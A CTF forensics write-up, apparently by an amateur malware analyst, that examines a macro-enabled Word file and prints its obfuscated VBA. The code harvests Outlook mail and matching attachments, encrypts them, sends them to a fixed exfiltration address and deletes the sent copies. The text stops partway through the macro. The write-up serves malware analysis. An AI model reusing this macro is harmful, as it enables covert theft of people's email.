OLE - Dirty Laundry [Forensics]

Introduction


Challenge Description:
We managed to retrieve a sample of the spyware and suspicious mail that seems to be produced by the spyware. Can you analyze the provided files 'mail.txt' and 'invisible_shields.docm', and find out what happened?

This is from mail.txt:

From: Austin <taustin@whschool.com> 
To: dph@whschool.com 
Subject: Outlook Exfiltration Data from User: taustin


*twGsy*#p7XY8CT4N3RpGq5xDzL7EMHW|MZgInjVQiig/Ce4mInU3xVamChLH3kT4ME1JJ9YEHJuCFLa1Zfg+I5d2h5j1QkGwNj237XLiaBtzkualk2WiJg==

And indeed we have a file called invisible_shields.docm:

Now a tip from me, an amateur maldoc creator and maldoc analyst: whenever you have a file with the .docm extension, the "m" in that extension means it is a macro-enabled document. Macros contain scripts written in VBA (Visual Basic for Applications), a programming language that lets users automate tasks and create personalised solutions within Microsoft Excel or Word. However, modern document viewers have macros disabled by default.

Stage 1 Analysis


When you have a macro-enabled file, it's best to use olevba to extract and analyse the potentially malicious macros. You can download it through here or, if you are using pip, install the oletools package (which includes olevba) with the following command:

sudo pip3 install oletools

Also, when using olevba, it's best to add the --deobf and --decode switches to deobfuscate and decode if there are any obfuscated or encoded strings within the VBA. As you can see here, the extracted VBA is shown:

As shown in the image above, the obfuscation mainly used here is XOR, which is written Xor in VBA syntax. So, what I did was replace every Xor statement with ^, Python's XOR operator, to make it simpler for me to deobfuscate with Python. You can consider this Stage 1 of deobfuscating the VBA script; it makes the script easier to deobfuscate in Stage 2. Yes, I did it manually, for every. single. instance.

Const exfil_address As String = "dph@whschool.com"
Private SiTdrVDFDh       As Boolean
Private lxtmwrylodux((0 + (0 ^ 0)) To ((5 ^ 10) + (11 ^ 59))) As Byte
Private djMloUrgDXwtHC((0 ^ 0) To ((9 ^ 7) + 113)) As Byte
Function FVaFfsygaGuUBB(JulhxRTJAtZ)
Dim atBjGMlxGDau As Variant
Dim IsNslKdUSos As Long
Dim ULDvZWynDzG As String
atBjGMlxGDau = Array(nkalPYSrDkoirG(Array(((1 ^ 3) + 15)), ((0 ^ 7) + (5 ^ 12))), nkalPYSrDkoirG(Array(150), ((4 ^ 13) + (2 ^ 10))), nkalPYSrDkoirG(Array(25), ((2 ^ 0) + 16)), nkalPYSrDkoirG(Array((166 + (33 ^ 101))), (11 ^ 24)), nkalPYSrDkoirG(Array(63), (19 ^ 7)), nkalPYSrDkoirG(Array(((25 ^ 218) + 5)), (18 ^ 7)), nkalPYSrDkoirG(Array((87 + 136)), ((11 ^ 4) + 7)), nkalPYSrDkoirG(Array(((39 ^ 12) + 7)), ((18 ^ 1) + (1 ^ 5))), nkalPYSrDkoirG(Array((73 + 22)), (8 ^ 16)), _
 nkalPYSrDkoirG(Array((11 + 55)), 25), _
nkalPYSrDkoirG(Array(((23 ^ 95) + 140)), (15 + (8 ^ 3))), nkalPYSrDkoirG(Array((51 ^ 121)), (11 ^ 16)), nkalPYSrDkoirG(Array(((17 ^ 32) + (32 ^ 20))), 28), nkalPYSrDkoirG(Array((13 ^ 24)), 29), nkalPYSrDkoirG(Array((41 + 0)), ((2 ^ 14) + 18)), nkalPYSrDkoirG(Array(221), ((5 ^ 15) + (21 ^ 0))), nkalPYSrDkoirG(Array(((36 ^ 165) + (1 ^ 13))), 32), nkalPYSrDkoirG(Array((155 + (68 ^ 17))), 33), nkalPYSrDkoirG(Array((110 + 26)), ((3 ^ 16) + 15)), nkalPYSrDkoirG(Array((35 + (59 ^ 65))), 35), _
 nkalPYSrDkoirG(Array((225 ^ 30)), (4 ^ 32)), nkalPYSrDkoirG(Array(((8 ^ 78) + 103)), ((10 ^ 0) + 27)), nkalPYSrDkoirG(Array((50 ^ 185)), (28 ^ 58)), nkalPYSrDkoirG(Array((31 ^ 103)), ((6 ^ 17) + (1 ^ 17))), _
nkalPYSrDkoirG(Array(((1 ^ 0) + (2 ^ 0))), (40 + (0 ^ 0))), nkalPYSrDkoirG(Array(((23 ^ 48) + 125)), (41 + (0 ^ 0))), nkalPYSrDkoirG(Array(((4 ^ 2) + 12)), (20 + 22)), nkalPYSrDkoirG(Array(((30 ^ 34) + (10 ^ 159))), (15 + 28)), nkalPYSrDkoirG(Array(((36 ^ 31) + (37 ^ 95))), 44), nkalPYSrDkoirG(Array((62 + 0)), 45), nkalPYSrDkoirG(Array(129), (19 + 27)), nkalPYSrDkoirG(Array(((12 ^ 53) + 155)), (12 + 35)), nkalPYSrDkoirG(Array(((7 ^ 10) + (9 ^ 7))), 48), nkalPYSrDkoirG(Array(((115 ^ 205) + (25 ^ 53))), _
(41 ^ 24)), nkalPYSrDkoirG(Array((100 ^ 29)), (16 ^ 34)), nkalPYSrDkoirG(Array(173), 51), nkalPYSrDkoirG(Array((20 + 130)), (26 + (22 ^ 12))), nkalPYSrDkoirG(Array(94), 53), _
nkalPYSrDkoirG(Array(73), 54), nkalPYSrDkoirG(Array(((15 ^ 23) + (32 ^ 16))), 55), nkalPYSrDkoirG(Array((60 + 69)), 56), nkalPYSrDkoirG(Array((199 + (3 ^ 13))), ((0 ^ 2) + (1 ^ 54))), nkalPYSrDkoirG(Array(29), 58), nkalPYSrDkoirG(Array(((14 ^ 31) + (2 ^ 7))), ((55 ^ 14) + (1 ^ 3))), nkalPYSrDkoirG(Array(((43 ^ 26) + 41)), 60), nkalPYSrDkoirG(Array((8 + (2 ^ 5))), (49 + (1 ^ 13))), nkalPYSrDkoirG(Array(192), ((1 ^ 18) + (29 ^ 54))), nkalPYSrDkoirG(Array(138), (41 + (14 ^ 24))), _
 nkalPYSrDkoirG(Array((138 ^ 76)), 64), nkalPYSrDkoirG(Array(((90 ^ 51) + (49 ^ 103))), 65), nkalPYSrDkoirG(Array(((1 ^ 0) + 41)), (14 + 52)), nkalPYSrDkoirG(Array(((41 ^ 22) + 146)), 67), _
nkalPYSrDkoirG(Array((110 ^ 147)), 68), nkalPYSrDkoirG(Array(((56 ^ 103) + 24)), 69), nkalPYSrDkoirG(Array(45), (36 + (29 ^ 63))), nkalPYSrDkoirG(Array(((0 ^ 2) + (22 ^ 48))), 71), nkalPYSrDkoirG(Array(98), ((0 ^ 19) + (45 ^ 24))), nkalPYSrDkoirG(Array(((66 ^ 15) + (48 ^ 6))), (17 ^ 88)), nkalPYSrDkoirG(Array((9 ^ 84)), (48 + (4 ^ 30))), nkalPYSrDkoirG(Array((129 + (17 ^ 14))), (5 ^ 78)), nkalPYSrDkoirG(Array((32 ^ 182)), ((4 ^ 26) + 46)), nkalPYSrDkoirG(Array((76 ^ 254)), _
(25 + (51 ^ 7))), nkalPYSrDkoirG(Array((67 ^ 221)), (43 ^ 101)), nkalPYSrDkoirG(Array((14 + 184)), 79), nkalPYSrDkoirG(Array((98 ^ 147)), ((28 ^ 2) + 50)), nkalPYSrDkoirG(Array((14 + 12)), 81), _
nkalPYSrDkoirG(Array(82), (16 ^ 66)), nkalPYSrDkoirG(Array((119 + 123)), 83), nkalPYSrDkoirG(Array((7 ^ 13)), (35 + 49)), nkalPYSrDkoirG(Array(32), 85))
For IsNslKdUSos = ((0 ^ 1) + (0 ^ 0)) To JulhxRTJAtZ
Randomize
ULDvZWynDzG = ULDvZWynDzG & atBjGMlxGDau(Int((UBound(atBjGMlxGDau) - LBound(atBjGMlxGDau) + 1) * Rnd + LBound(atBjGMlxGDau)))
Next IsNslKdUSos
FVaFfsygaGuUBB = ULDvZWynDzG
End Function

Function MTDPxqUeBtnHy(QvXdgzREtgivJc, MJAnPLmDOHCpM)
MTDPxqUeBtnHy = QvXdgzREtgivJc
If MJAnPLmDOHCpM < QvXdgzREtgivJc Then MTDPxqUeBtnHy = MJAnPLmDOHCpM
End Function

Function ahSFGkugmp(NfZjOnhlizlg)
Dim BPFDRGiTpeffVc As String
Dim IxqNKATnfrjL() As Byte
Dim PIBNxhGCNMURDD As Object
Dim MyKtJzYAsXy As Object
Dim xothlNMzDN, JulhxRTJAtZ, QrbstMncnU As Integer
Set PIBNxhGCNMURDD = CreateObject(nkalPYSrDkoirG(Array((25 + 40), (0 ^ 15), (117 + 52), (22 ^ 69), (146 ^ 40)), (40 + (43 ^ 5))) & nkalPYSrDkoirG(Array(160, ((4 ^ 0) + (46 ^ 77)), ((26 ^ 42) + 80), (5 ^ 13), 139, ((25 ^ 93) + (12 ^ 17)), 250, 79, (33 + (35 ^ 29)), (193 + (25 ^ 6)), 170, (3 + 93), (174 ^ 91), ((31 ^ 88) + (0 ^ 0)), 103, (148 ^ 46), ((10 ^ 16) + (2 ^ 16)), 103, (99 + (6 ^ 61)), (17 ^ 14), ((61 ^ 105) + (70 ^ 210)), ((21 ^ 70) + (34 ^ 12)), 82, (170 + (7 ^ 15)), 18, 133, (62 ^ 77), _
((172 ^ 29) + 17), ((57 ^ 127) + (106 ^ 16)), (45 ^ 111), (137 ^ 62), (30 + (3 ^ 5)), (128 + 54), (20 + (18 ^ 0)), (134 + 103), (70 + 112), ((2 ^ 69) + 125), ((2 ^ 12) + 150), (180 + 57), (209 + (4 ^ 1)), 214), ((19 ^ 0) + 72)))
Set MyKtJzYAsXy = CreateObject(nkalPYSrDkoirG(Array((68 + 14), (3 + (1 ^ 11)), (32 ^ 80), (25 + (0 ^ 2)), ((36 ^ 3) + (51 ^ 117)), 196, 165, (171 + (1 ^ 26)), (62 + (73 ^ 217)), (82 + 34), ((54 ^ 10) + (6 ^ 34)), ((13 ^ 23) + 48), 41, (161 + (22 ^ 64)), 250), (117 ^ 241)) & nkalPYSrDkoirG(Array(9, (102 + (34 ^ 96)), ((26 ^ 0) + (3 ^ 117)), (102 ^ 237), (21 ^ 190), 93, ((109 ^ 249) + 86), (98 ^ 249), ((4 ^ 145) + (12 ^ 20))), (139 + (7 ^ 15))))
QrbstMncnU = PIBNxhGCNMURDD.InputBlockSize
For xothlNMzDN = ((0 ^ 0) + 0) To LenB(NfZjOnhlizlg) - (0 ^ 1) Step QrbstMncnU
JulhxRTJAtZ = MTDPxqUeBtnHy(QrbstMncnU, UBound(NfZjOnhlizlg) - xothlNMzDN)
IxqNKATnfrjL = PIBNxhGCNMURDD.TransformFinalBlock((NfZjOnhlizlg), xothlNMzDN, JulhxRTJAtZ)
BPFDRGiTpeffVc = BPFDRGiTpeffVc & MyKtJzYAsXy.GetString((IxqNKATnfrjL))
Next
ahSFGkugmp = BPFDRGiTpeffVc
End Function

Function uEfmNHGlYFaj(qcGjVkReTg)
Dim MyKtJzYAsXy As Object
Dim NfZjOnhlizlg() As Byte
Dim ScMpMxoqdQ As Object
Set MyKtJzYAsXy = CreateObject(nkalPYSrDkoirG(Array(((2 ^ 35) + 153), 199, (101 + (104 ^ 224)), (74 + 99), 11), ((17 ^ 39) + 102)) & nkalPYSrDkoirG(Array(((27 ^ 63) + (3 ^ 5)), ((11 ^ 7) + 135), (26 + 218), (51 ^ 208), ((83 ^ 51) + (35 ^ 90)), (12 ^ 24), (120 ^ 136), 189, ((55 ^ 98) + (64 ^ 20)), 218, 150, (35 + 183), 26, (104 ^ 16), (14 ^ 16), ((33 ^ 171) + 109), ((10 ^ 117) + (51 ^ 92)), (13 ^ 42), ((9 ^ 3) + 93)), (0 + (124 ^ 221))))
Set ScMpMxoqdQ = CreateObject(nkalPYSrDkoirG(Array(((12 ^ 19) + (2 ^ 8)), (1 ^ 17), (35 ^ 224), 43, ((5 ^ 13) + (26 ^ 52)), (194 ^ 33), ((128 ^ 43) + (0 ^ 0)), (26 + (8 ^ 28)), ((5 ^ 8) + 32), (3 ^ 8), ((0 ^ 6) + 108), (211 ^ 43), (10 + 8), (4 + (86 ^ 231)), ((102 ^ 244) + (53 ^ 101)), (14 ^ 38), (70 ^ 41), 219, (9 + 121), ((83 ^ 216) + (7 ^ 21)), 226, ((6 ^ 24) + (3 ^ 7)), (111 + 95), 1, (17 + 23), (77 + 64), ((2 ^ 4) + (0 ^ 1)), (91 + (4 ^ 28)), ((75 ^ 255) + 34), 206, (131 + (14 ^ 26)), _
((20 ^ 100) + (24 ^ 72)), (9 + 197), 49, 69), ((1 ^ 4) + 175)) & nkalPYSrDkoirG(Array(((1 ^ 3) + (1 ^ 0)), (133 ^ 59), ((9 ^ 36) + (1 ^ 102)), ((70 ^ 192) + (56 ^ 122)), (18 ^ 74), 140, 195, 140, 153, (77 + (44 ^ 79)), (65 ^ 215), ((18 ^ 6) + 221), 144), (213 ^ 2)))
NfZjOnhlizlg = MyKtJzYAsXy.GetBytes_4(qcGjVkReTg)
uEfmNHGlYFaj = ScMpMxoqdQ.TransformFinalBlock((NfZjOnhlizlg), 0, UBound(NfZjOnhlizlg))
End Function

Function ydcyecOpBU(dGArFkUqGLilS)
Dim NdOBkdEXtS, wotFUFrkOjPBgY, zGRVIukttQSSEv, qdjbSxTRAtUT() As Byte
Dim BFSsfIzKNm As String
BFSsfIzKNm = FVaFfsygaGuUBB(32)
Dim MyKtJzYAsXy, igFwXpLeArakc, zrjycZwtKFJvAu, IVdDfkxSWPOTi As Object
Dim kSNpGaWBeFRbpl() As Byte
Set igFwXpLeArakc = CreateObject(nkalPYSrDkoirG(Array((114 ^ 242), (25 ^ 4), ((1 ^ 7) + 100), ((4 ^ 2) + 25), 232, (21 + 153), (67 + 6), (188 ^ 79), (83 + 8), ((7 ^ 8) + 5), (132 + (22 ^ 57)), 19), ((91 ^ 244) + (52 ^ 1))) & nkalPYSrDkoirG(Array(((13 ^ 126) + 23), (11 + (0 ^ 0)), (21 + (25 ^ 123)), (50 + (14 ^ 84)), ((21 ^ 43) + (4 ^ 1)), (89 + 19), 195, ((27 ^ 55) + 100), ((1 ^ 7) + (11 ^ 35)), 90, (6 + 12), 82, 93, (27 ^ 35), 103, (11 + (8 ^ 56)), (126 + 60), (58 ^ 114), (9 + (1 ^ 14)), (133 + (34 ^ 98)), 227, _
(2 ^ 106), (10 + 12), (61 + 16), (46 + (55 ^ 99)), 139, (40 + (37 ^ 99)), 160, (3 ^ 0), ((54 ^ 121) + (5 ^ 21)), (79 + 33), (2 ^ 219)), (215 ^ 39)))
Set MyKtJzYAsXy = CreateObject(nkalPYSrDkoirG(Array((1 ^ 5), 92, ((42 ^ 1) + 17), (25 ^ 63), (26 ^ 52), (45 ^ 28), 104, ((10 ^ 25) + 132), 61, (81 ^ 61), 167, 130, (40 ^ 1), 233, (138 ^ 81), ((21 ^ 45) + (70 ^ 22)), 175, (37 + 92), 75, (74 + 123), 16, (8 ^ 108)), ((69 ^ 37) + 176)) & nkalPYSrDkoirG(Array(((80 ^ 219) + (3 ^ 5)), (46 ^ 85)), ((86 ^ 37) + 179)))
igFwXpLeArakc.KeySize = 256
igFwXpLeArakc.QrbstMncnU = 256
igFwXpLeArakc.Mode = (1 + 0)
igFwXpLeArakc.Key = CreateObject(nkalPYSrDkoirG(Array(0, 197, 27, 133, 56, 40, 80, 11, 178, 159, 177, 111, 197, 230, 72, 128, 66), 296) & _
nkalPYSrDkoirG(Array(160, 61, 255, 59, 234, 83, 133), 313)).GetBytes_4(nkalPYSrDkoirG(Array((27 ^ 96), (69 ^ 194), 173, (126 + 125), 121, (59 ^ 163), (34 ^ 135), ((35 ^ 6) + 94), 51, ((12 ^ 0) + (87 ^ 9)), (17 + (2 ^ 4)), 231, (20 + (21 ^ 8)), ((0 ^ 3) + 110), 196, (169 + 19), 30, 231, (66 + (7 ^ 106)), (210 ^ 51), (97 + 17), (142 + (5 ^ 26)), (9 + (98 ^ 167)), 191, 220, (31 ^ 205), ((42 ^ 91) + 120), (94 + 0), 135), (51 ^ 371)) & _
nkalPYSrDkoirG(Array((37 ^ 176), ((6 ^ 47) + 190), 36), ((161 ^ 123) + (40 ^ 171))))


igFwXpLeArakc.BFSsfIzKNm = CreateObject(nkalPYSrDkoirG(Array((60 ^ 107), (128 + 45), (72 + 14), ((10 ^ 0) + (137 ^ 70)), (25 + (3 ^ 15)), 115, ((15 ^ 30) + (19 ^ 34)), (0 ^ 233), (161 ^ 10), (187 ^ 0), 26), ((310 ^ 124) + (19 ^ 5))) & nkalPYSrDkoirG(Array(((31 ^ 47) + 26), (51 + 123), 187, ((11 ^ 17) + (46 ^ 67)), (99 + 33), (24 ^ 91), (51 ^ 171), (17 + (31 ^ 45)), (15 ^ 149), ((9 ^ 27) + (1 ^ 3)), (18 + 6), (2 ^ 37), 73), (102 ^ 269))).GetBytes_4(BFSsfIzKNm)
qdjbSxTRAtUT = CreateObject(nkalPYSrDkoirG(Array(((14 ^ 30) + 17), (153 ^ 62), (194 + (2 ^ 37)), 97, ((46 ^ 26) + (41 ^ 157)), 150, (102 ^ 227), (107 ^ 243), ((4 ^ 1) + (136 ^ 55)), ((20 ^ 12) + (34 ^ 122)), (228 + 22), 209, (24 + 40), (36 + 56), 38, 253, (75 + (3 ^ 135)), (87 + (14 ^ 46))), (58 ^ 322)) & nkalPYSrDkoirG(Array((15 ^ 101), ((42 ^ 18) + (26 ^ 59)), (5 ^ 110), ((90 ^ 203) + 21), (123 ^ 132), 238), ((8 ^ 2) + 384))).GetBytes_4(dGArFkUqGLilS)
NdOBkdEXtS = igFwXpLeArakc.CreateEncryptor().TransformFinalBlock((qdjbSxTRAtUT), (0 + (0 ^ 0)), UBound(qdjbSxTRAtUT))
ydcyecOpBU = BFSsfIzKNm & nkalPYSrDkoirG(Array((80 ^ 7)), 400) & ahSFGkugmp(NdOBkdEXtS)
End Function

Sub jexCsPbeKyQ()
Dim whDjrLULSB
whDjrLULSB = Array( _
nkalPYSrDkoirG(Array(((11 ^ 95) + (15 ^ 50)), ((9 ^ 195) + 45), 232, 39, ((32 ^ 4) + (12 ^ 156)), (1 ^ 3), (8 ^ 7)), (210 + (161 ^ 30))) & nkalPYSrDkoirG(Array(((2 ^ 40) + (63 ^ 105))), (163 + (235 ^ 30))), _
nkalPYSrDkoirG(Array((36 ^ 25), (47 ^ 144), (48 ^ 175), ((36 ^ 19) + (66 ^ 228)), 67, 62), 409), _
nkalPYSrDkoirG(Array(((4 ^ 15) + (4 ^ 15)), ((81 ^ 8) + (56 ^ 94)), (64 + (8 ^ 0)), 72, (174 ^ 93)), (318 + (48 ^ 81))), _
nkalPYSrDkoirG(Array(81, (89 ^ 222), (72 ^ 147), 250, (0 ^ 98), (9 + 126), ((135 ^ 31) + (0 ^ 74)), ((88 ^ 33) + (79 ^ 18)), (47 + 3)), ((105 ^ 260) + 55)) & nkalPYSrDkoirG(Array(183), (122 ^ 471)), _
nkalPYSrDkoirG(Array(((14 ^ 0) + 17), (0 + 0), 15, ((3 ^ 205) + (24 ^ 41)), (69 + (0 ^ 31))), (330 + (73 ^ 45))) & nkalPYSrDkoirG(Array((57 + (0 ^ 158)), (19 ^ 251), (70 ^ 22), 157, (148 ^ 37), (158 + (83 ^ 8))), ((78 ^ 44) + 337)), _
nkalPYSrDkoirG(Array((84 ^ 244), ((7 ^ 20) + (6 ^ 27)), (189 + (39 ^ 17)), 84, (62 + (44 ^ 20)), 78), (273 ^ 168)) & nkalPYSrDkoirG(Array((74 + 71), ((0 ^ 4) + 32), (118 ^ 185), (33 ^ 213)), 447), _
nkalPYSrDkoirG(Array(114, ((54 ^ 100) + 173), ((20 ^ 122) + (24 ^ 1)), ((0 ^ 0) + 236), 183), 451) & nkalPYSrDkoirG(Array(((17 ^ 7) + (32 ^ 26)), (60 + 21), 233, ((48 ^ 105) + 29), ((41 ^ 108) + (50 ^ 191)), (82 ^ 219), (14 + 233), (4 ^ 13), (0 ^ 3), ((98 ^ 255) + (16 ^ 33)), ((59 ^ 70) + 80), ((11 ^ 23) + (2 ^ 10)), 145, ((0 ^ 0) + (9 ^ 27)), (43 + (5 ^ 40)), 178, ((32 ^ 105) + (6 ^ 9))), (71 + (120 ^ 505))) _
)
Dim RQRaVHWlfs
RQRaVHWlfs = Array( _
nkalPYSrDkoirG(Array(((10 ^ 0) + 26), (14 + (50 ^ 149)), ((73 ^ 4) + (28 ^ 57))), ((153 ^ 115) + (150 ^ 110))), _
nkalPYSrDkoirG(Array(((140 ^ 18) + 86), ((4 ^ 29) + 106), (25 ^ 59)), (389 + (29 ^ 125))), _
nkalPYSrDkoirG(Array((33 + 101), ((0 ^ 14) + 8), (35 + 9)), (242 ^ 282)), _
nkalPYSrDkoirG(Array((199 + 14), 155, ((164 ^ 10) + 36)), 491), _
nkalPYSrDkoirG(Array((72 ^ 181), (134 + 20), 166), (220 + 274)), _
nkalPYSrDkoirG(Array(((5 ^ 25) + 32), 249), ((235 ^ 501) + 211)) & nkalPYSrDkoirG(Array(((27 ^ 57) + 58), 111, 53, ((0 ^ 0) + (0 ^ 0)), (12 ^ 2)), (4 + 495)), _
nkalPYSrDkoirG(Array((7 + (32 ^ 155)), ((0 ^ 0) + (2 ^ 34)), 13), ((3 ^ 416) + (8 ^ 93))), _
nkalPYSrDkoirG(Array(((0 ^ 0) + 123), ((13 ^ 16) + (0 ^ 0)), (209 + 10)), 507), _
nkalPYSrDkoirG(Array((8 ^ 97), ((19 ^ 96) + (0 ^ 60)), 240), ((117 ^ 431) + (28 ^ 56))), _
nkalPYSrDkoirG(Array(((37 ^ 13) + (69 ^ 194)), (136 ^ 49), (79 + (23 ^ 33)), ((13 ^ 28) + (0 ^ 7))), ((96 ^ 19) + (324 ^ 202))), _
nkalPYSrDkoirG(Array((13 ^ 134), 22, (145 + 25), 55), 517), _
nkalPYSrDkoirG(Array(((45 ^ 16) + (0 ^ 2)), 233, (60 ^ 92), (61 ^ 119)), 521), _
nkalPYSrDkoirG(Array(13, 180, (77 ^ 233)), (261 ^ 776)), _
nkalPYSrDkoirG(Array(118, (42 ^ 27), ((10 ^ 19) + 23)), 528), _
nkalPYSrDkoirG(Array((4 ^ 27), ((21 ^ 84) + (16 ^ 5)), (40 + 0), (18 ^ 51)), (65 + 466)), _
nkalPYSrDkoirG(Array((215 + 10), 47, (2 + (0 ^ 157)), (24 ^ 6)), 535), _
nkalPYSrDkoirG(Array((37 + 5), ((4 ^ 1) + (129 ^ 10)), (5 + (0 ^ 6))), (35 + 504)), _
nkalPYSrDkoirG(Array(((29 ^ 60) + 14), (14 ^ 56), (9 ^ 182)), (177 + 365)), _
nkalPYSrDkoirG(Array((169 + (24 ^ 46)), ((33 ^ 108) + 103), 184), (29 + 516)), _
nkalPYSrDkoirG(Array((174 ^ 23), (32 + (1 ^ 3))), (121 ^ 605)), _
nkalPYSrDkoirG(Array((132 + (1 ^ 11)), (87 + (9 ^ 103)), (82 ^ 202)), (398 + 152)), _
nkalPYSrDkoirG(Array(244, (137 ^ 107), 208), ((120 ^ 480) + 145)) _
)
Dim PtXoKYFkpFJGSc As Object
Dim XstsppFkvZr As Object
Dim emDROsRKEd As String
Dim xfjOpXLsBTY As Object
Dim FCMymRIsfbrg As Object
Set PtXoKYFkpFJGSc = CreateObject(nkalPYSrDkoirG(Array(32, ((0 ^ 3) + (87 ^ 45)), ((1 ^ 4) + 140), (55 + (10 ^ 26)), (30 + 55), (21 ^ 234), (150 + (7 ^ 56)), 53, (127 + (100 ^ 23)), (12 + (37 ^ 166))), (318 + 238)) & nkalPYSrDkoirG(Array((95 + (2 ^ 102)), 175, 156, (45 ^ 19), ((11 ^ 4) + 1), (2 + 207), (6 ^ 132), (51 ^ 172), (105 + 127)), ((166 ^ 79) + 333)))
Set xfjOpXLsBTY = PtXoKYFkpFJGSc.GetNamespace(nkalPYSrDkoirG(Array(((4 ^ 15) + 20), ((16 ^ 2) + 24), (196 ^ 14), (14 ^ 171)), 575))
Set FCMymRIsfbrg = xfjOpXLsBTY.GetDefaultFolder((3 + (2 ^ 1))).Items
Dim KLMydQnxMZSOX As Integer
Dim JxQPJFEkRSPeB As Boolean
JxQPJFEkRSPeB = False
Dim jUBrimEvzM As Boolean
jUBrimEvzM = False
Dim qeFHkrcXQwLmue As Date
Dim kcINMJtMyDQgLL As Date
Const daysToSearch As Integer = (357 ^ 245)
qeFHkrcXQwLmue = Date - daysToSearch
kcINMJtMyDQgLL = Date
Dim QmmdKXwuMa As Object
For Each QmmdKXwuMa In FCMymRIsfbrg
If QmmdKXwuMa.ReceivedTime >= qeFHkrcXQwLmue And QmmdKXwuMa.ReceivedTime <= kcINMJtMyDQgLL Then
JxQPJFEkRSPeB = haPxSQQXjz(QmmdKXwuMa.body, QmmdKXwuMa.Subject, whDjrLULSB)
If JxQPJFEkRSPeB Then
Call ScsSqzpSPu(QmmdKXwuMa.body, QmmdKXwuMa.Subject)
End If
If QmmdKXwuMa.Attachments.Count > ((0 ^ 0) + 0) Then
Dim xZLUISSiXEpR As Integer
For xZLUISSiXEpR = 1 To QmmdKXwuMa.Attachments.Count
jUBrimEvzM = mvieYItXUPBIvj(QmmdKXwuMa.Attachments.Item(xZLUISSiXEpR), RQRaVHWlfs, whDjrLULSB)
If jUBrimEvzM Then
Call RkrRzFVxFXd(QmmdKXwuMa, QmmdKXwuMa.Subject)
End If
Next
End If
End If
Next
Set XstsppFkvZr = Nothing
Set PtXoKYFkpFJGSc = Nothing
End Sub
Sub ScsSqzpSPu(IehgfWzjBPM As String, gjQiIlwvaI As String)
Dim PtXoKYFkpFJGSc As Object
Dim XstsppFkvZr As Object
Dim emDROsRKEd As String
Set PtXoKYFkpFJGSc = CreateObject(nkalPYSrDkoirG(Array(214, (46 + (45 ^ 2)), ((31 ^ 92) + (34 ^ 0)), (29 + (15 ^ 69)), (197 ^ 37), (161 ^ 104), (68 + 3), ((31 ^ 86) + (5 ^ 8)), (7 + (0 ^ 7))), ((24 ^ 248) + 355)) & nkalPYSrDkoirG(Array(56, (28 ^ 120), (3 ^ 182), (76 ^ 29), (77 + 12), ((20 ^ 12) + 57), ((34 ^ 83) + 135), ((1 ^ 2) + 23), (145 ^ 55), ((72 ^ 2) + (7 ^ 10))), (468 ^ 920)))
Set XstsppFkvZr = PtXoKYFkpFJGSc.CreateItem(0)
emDROsRKEd = IehgfWzjBPM
On Error Resume Next
With XstsppFkvZr
.To = exfil_address
.CC = nkalPYSrDkoirG(Array(), 614)
.BCC = nkalPYSrDkoirG(Array(), (156 ^ 762))
.Subject = nkalPYSrDkoirG(Array(145, 63, (49 ^ 192), ((1 ^ 23) + 18), (66 ^ 13), (8 ^ 3), ((199 ^ 15) + (0 ^ 6)), (4 + (62 ^ 121)), (30 + (105 ^ 196)), 110, (96 ^ 3), (112 + 7), (81 ^ 204), (94 ^ 241), 96, 33, 112, 243, ((29 ^ 58) + 151), (96 ^ 194), ((1 ^ 0) + 11), 14, (24 ^ 43), ((45 ^ 105) + 55), ((30 ^ 59) + 165), 234, 175, (2 + 29), 235, 200, (17 + 178), 224, 147, 11), (366 + 248)) & nkalPYSrDkoirG(Array((38 + 63), (85 ^ 189), 121), (417 + 231)) & Environ(nkalPYSrDkoirG(Array(19, 248), _
((260 ^ 8) + (133 ^ 506))) & nkalPYSrDkoirG(Array(((0 ^ 145) + (2 ^ 26)), 114, ((21 ^ 32) + (17 ^ 14)), ((26 ^ 58) + 60), 212, ((15 ^ 21) + 86)), ((273 ^ 67) + 315)))
.body = ydcyecOpBU(gjQiIlwvaI & emDROsRKEd)
.DeleteAfterSubmit = True
.Send
End With
On Error GoTo 0
Set XstsppFkvZr = Nothing
Set PtXoKYFkpFJGSc = Nothing
End Sub
Sub RkrRzFVxFXd(QmmdKXwuMa As Variant, gjQiIlwvaI As String)
Dim XstsppFkvZr As Object
Set XstsppFkvZr = QmmdKXwuMa.Forward
On Error Resume Next
With XstsppFkvZr
.To = exfil_address
.CC = nkalPYSrDkoirG(Array(), ((269 ^ 911) + 33))
.BCC = nkalPYSrDkoirG(Array(), 675)
.Subject = nkalPYSrDkoirG(Array((87 ^ 40), (218 + (0 ^ 2)), (19 + 12), ((4 ^ 11) + 135), (35 ^ 240), ((72 ^ 56) + 19), (66 ^ 5), ((4 ^ 25) + 14), 170, ((5 ^ 97) + (54 ^ 190)), 164, 166, ((89 ^ 62) + 9), (13 ^ 28), 25, (109 + (7 ^ 10)), 182, ((0 ^ 0) + 170), (122 ^ 181), (2 + (6 ^ 20)), (99 ^ 152), (16 ^ 0), ((29 ^ 85) + (22 ^ 54)), ((9 ^ 0) + 21), (156 + (81 ^ 0)), (58 ^ 160), 60, ((6 ^ 44) + (84 ^ 210)), 203, ((16 ^ 0) + (12 ^ 28)), (164 ^ 118), (159 + 19), (21 + (32 ^ 164)), (136 + 4), 89, _
((0 ^ 12) + (24 ^ 1)), (42 + 58), ((56 ^ 104) + 164), ((1 ^ 3) + (2 ^ 220))), 675) & nkalPYSrDkoirG(Array((14 ^ 119), (34 ^ 189), 195, ((0 ^ 8) + 247)), 714) & Environ(nkalPYSrDkoirG(Array(((8 ^ 84) + 30), (16 ^ 100), 80, 109, (75 ^ 192), (121 ^ 211), (1 + (4 ^ 25))), 718) & nkalPYSrDkoirG(Array((103 ^ 245)), ((100 ^ 601) + 152)))
.DeleteAfterSubmit = True
.Send
End With
On Error GoTo 0
Set XstsppFkvZr = Nothing
End Sub
Public Function haPxSQQXjz(IehgfWzjBPM As String, gjQiIlwvaI As String, whDjrLULSB As Variant) As Boolean
haPxSQQXjz = False
Dim YXeXnGWwCIuAtn As Variant
For Each YXeXnGWwCIuAtn In whDjrLULSB
If (InStr(1, UCase(IehgfWzjBPM), YXeXnGWwCIuAtn, vbTextCompare) > (0 ^ 0)) Or (InStr(1, UCase(gjQiIlwvaI), YXeXnGWwCIuAtn, vbTextCompare) > (0 ^ 0)) Then
haPxSQQXjz = True
Exit For
Else
haPxSQQXjz = False
End If
Next
End Function

Public Function mvieYItXUPBIvj(OFTngrKtymtIs As Variant, RQRaVHWlfs As Variant, whDjrLULSB As Variant) As Boolean
mvieYItXUPBIvj = False
Dim sBtphCWmicZ As Boolean
sBtphCWmicZ = False
Dim FSvAGmBKEpy As Boolean
FSvAGmBKEpy = False
Dim KfBAtqXWVPbl As String
